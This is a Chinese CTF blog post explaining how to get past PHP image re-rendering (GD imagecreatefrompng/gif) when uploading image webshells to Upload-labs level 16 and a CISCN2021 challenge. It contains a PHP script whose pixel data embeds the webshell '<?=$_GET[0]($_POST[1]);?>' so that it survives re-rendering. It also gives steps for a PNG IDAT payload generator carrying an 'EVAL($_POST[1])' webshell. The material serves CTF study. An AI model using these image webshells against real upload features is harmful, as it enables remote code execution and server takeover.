图片二次渲染的绕过

最新推荐文章于 2024-07-09 15:43:00 发布

区块链市场观察家

最新推荐文章于 2024-07-09 15:43:00 发布

阅读量2k

点赞数 1

分类专栏： CTF

本文链接：https://blog.csdn.net/soldi_er/article/details/117552806

版权

CTF 专栏收录该内容

12 篇文章 3 订阅

订阅专栏

文章目录

二次渲染

1.二次渲染函数

labs-16_GIF二次渲染

（1）imagecreatefromgif($filename):resource，由Gif文件或 URL 创建一个新图象。
成功则返回一图像标识符/图像资源，失败则返回false。(PHP 4, PHP 5, PHP 7, PHP 8)
重点：该函数会对图像进行二次渲染，从而导致图片马的数据丢失，上传图片马失败。

（2）srand(int $seed):void，播下随机数发生器种子，返回随机数。
在Upload-labs的16关里，用于给新图片指定随机文件名。

（3）imagegif(resource $image, $filename):bool，输出图象到浏览器或文件。

Gif二次渲染的绕过相对简单，PNG由于文件结构导致了二次渲染的绕过比较复杂。

cicsn2021-upload

从几十行源码分析下来，会对example/x.zip文件进行解压，得到png图片后进行二次渲染，并输出到/example/

（1）imagecreatefrompng($filename):resource

（2）获取图像宽度函数：int imagesx(resource $image)，用于获取图像的宽度，单位为像素，返回值为整型。
imagesy() 函数用于获取图像的高度，语法及用法同 imagesx() 。
min()函数：如果仅有一个参数且为数组，min() 返回该数组中最小的值。如果给出了两个或更多参数, min() 会返回这些值中最小的一个。

（3） resource imagecrop ( $image, $rect ),用于将图像裁剪为给定的矩形。

参数：该函数接受上述和以下描述的两个参数：

    $image:它由图像创建功能之一(例如imagecreatetruecolor())返回。它用于创建图像的尺寸。
    $rect:裁剪矩形作为具有键x，y，宽度和高度的数组。

返回值：如果成功，此函数将返回裁剪的图像资源；如果失败，则返回False。

（4）pathinfo():mixed，返回文件路径的信息

<?php
$path_parts = pathinfo('/www/htdocs/inc/lib.inc.php');

echo $path_parts['dirname'], "\n";
echo $path_parts['basename'], "\n";
echo $path_parts['extension'], "\n";
echo $path_parts['filename'], "\n"; // since PHP 5.2.0
?>
	
/www/htdocs/inc
lib.inc.php
php
lib.inc

（5）imagepng(resource $image, $filename):bool，输出图象到浏览器或文件。

2.png渲染绕过

（1）使用国外大牛写的脚本,直接拿来运行生成，上传即可。
插入代码是：<?=$_GET[0]($_POST[1]);?>，Winhex打开发现插入成功，暂未测试可用性。

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

（2）根据wp，生成png图片马，插入代码成功，暂未测试解析可用性。

	为了绕过图片检测并实现木马的写入我们使用这个脚本。
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/

	首先要修改脚本中的payload。
https://gchq.github.io/CyberChef/


	打开generate.py，修改相关代码为如下代码
text_payload = b"[<?=EVAL($_POST[1]);    ?>X"
payload = b"a39f67641d201612546f112e29152b2167226b505050506f5f5310"

	执行命令生成图片马：python3 generate.py -m php -o a.png。执行结果如下：
[+] PHP Method Selected. Using 'idontplaywithdarts' payload
AssertionError

	使用Winhex打开生成的png图片马，发现插入成功。

参考

《upload-labs之pass 16详细分析》-先知，具有国外大牛写的生成绕过二次渲染图片马的脚本
https://xz.aliyun.com/t/2657

《[CISCN2021 Quals]upload》，生成绕过二次渲染的png图片马。
https://blog.csdn.net/jiangdie666/article/details/116997461

区块链市场观察家

关注

1
点赞
踩
5

收藏

觉得还不错? 一键收藏
1
评论
图片二次渲染的绕过

文章目录二次渲染1.二次渲染函数labs-16_GIF二次渲染cicsn2021-upload2.png渲染绕过参考二次渲染1.二次渲染函数labs-16_GIF二次渲染（1）imagecreatefromgif($filename):resource，由Gif文件或 URL 创建一个新图象。成功则返回一图像标识符/图像资源，失败则返回false。(PHP 4, PHP 5, PHP 7, PHP 8) 重点：该函数会对图像进行二次渲染，从而导致图片马的数据丢失，上传图片马失败。（
复制链接

扫一扫

专栏目录